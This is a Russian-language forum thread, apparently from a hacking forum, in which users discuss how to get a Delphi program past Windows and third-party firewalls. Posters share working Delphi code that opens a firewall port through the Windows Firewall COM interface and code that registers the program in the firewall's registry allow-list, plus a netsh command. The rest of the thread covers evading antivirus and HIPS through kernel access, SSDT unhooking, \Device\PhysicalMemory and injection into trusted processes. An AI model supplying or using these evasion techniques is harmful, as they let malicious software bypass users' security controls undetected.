Подскажите как обойти брандмауэр, софт на делфи, говорят нужно прописать производителя от майкрософт, и тогда все будет ок. Как и где прописать производителя?
Я писал аот такой батничек Code: netsh firewall add allowedprogram "myprogram.exe" "my program" ENABLE Это только для стандартного мелкософт'овксого
Можно так: Делфи6 Code: // Include ActiveX and ComObj in uses clause const NET_FW_PROFILE_DOMAIN = 0; NET_FW_PROFILE_STANDARD = 1; const NET_FW_IP_PROTOCOL_TCP = 6; NET_FW_IP_PROTOCOL_UDP = 17; const NET_FW_SCOPE_ALL = 0; const NET_FW_IP_VERSION_ANY = 2; implementation {$R *.DFM} procedure TForm1.Button1Click(Sender: TObject); var ovMgr: OleVariant; ovProfile: OleVariant; ovPort: OleVariant; begin // Create manager interface ovMgr:=CreateOleObject('HNetCfg.FwMgr'); // Resource protection try // Get local profile interface ovProfile:=ovMgr.LocalPolicy.CurrentProfile; // Resource protection try // Create new port interface ovPort:=CreateOleObject('HNetCfg.FwOpenPort'); try // Set port properties ovPort.Port:=81; ovPort.Name:='Whatever'; ovPort.Scope:=NET_FW_SCOPE_ALL; ovPort.IpVersion:=NET_FW_IP_VERSION_ANY; ovPort.Protocol:=NET_FW_IP_PROTOCOL_TCP; ovPort.Enabled:=True; // Resource protection try // Add to globally open ports ovProfile.GloballyOpenPorts.Add(ovPort); //// // .... do whatever .... //// finally // Remove from globally open ports ovProfile.GloballyOpenPorts.Remove(81, NET_FW_IP_PROTOCOL_TCP); end; finally // Release interface ovPort:=Unassigned; end; finally // Release interface ovProfile:=Unassigned; end; finally // Release interface ovMgr:=Unassigned; end; end; А и можно так: Code: function Write2Reg(key:Hkey; subkey,name,value:string):boolean; var regkey:hkey; begin result := false; RegCreateKey(key,PChar(subkey),regkey); if RegSetValueEx(regkey,Pchar(name),0,REG_SZ,pchar(value),length(value)) = 0 then result := true; RegCloseKey(regkey); end; юзать так: Code: Write2Reg(HKEY_LOCAL_MACHINE,'SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List',paramstr(0),paramstr(0)+':*:Enabled:Den37');
2crypt0n ага, а дров ты будешь волшебной силой подгружать ^____^ 2Den37 ищи методы сам. Либо через реверс сэмплов малвари, либо через эксперименты. Просто так никто с тобой этой инфой делится не будет.
2Hiro Protagonist автор просил _как_ обойти фраер, а не проблемы с загрузкое драйвера (драйвер ? физ память еще никто не отменял)
2crypt0n пользовательские фаеры в данный момент не отделимы от своих HIPS. Бессмыслено обходить фаер, без обхода его HIPS, а обойдя его HIPS уже не имеет значения как ты будешь обходить фаер и драйвер для этого не нужен. И анхук ssdt не поможет в обходе фаера, тк этим ты не снимешь хуки с TDI и следовательно необходим инжект в любом случае. Думай, перед тем как писать.
Нужен. Есть возможность взаимодействовать с ядром без драйвера ( Ms-Rem расказывал как ), но этот способ довольно таки не удобен, так как нам нужно получить адреса необходимых нам функций ядра и еще много чего.
да, ms-rem писал, через \Device\PhysicalMemory (это и есть то что я понимаю под термином физической памятю). кстати так работает тулза SDTrestore
1) \device\physicalmemory - катит тока под админом. Палится всеми антивирями. геморно юзать. 2) Эксплоиты смысла во внимание брать нету, потому что пропатчат быстро, а антивири в сигнатуры внесут. 3) дрова - норм, но попасть беспаливно в ядро сложно. (если не знаеш как это делается) 4) обойти фаер из ядра сняв хуки - не так уж и легко. В частности последний аутпост 5) единственный норм способ - заинжектится в доверенный процес. А тут все средства хороши, но опять же палят антивири. Но если из ядра инжектится то они будут нервно курить в сторонке. Или временно снять их хуки 6) еще не придумал.
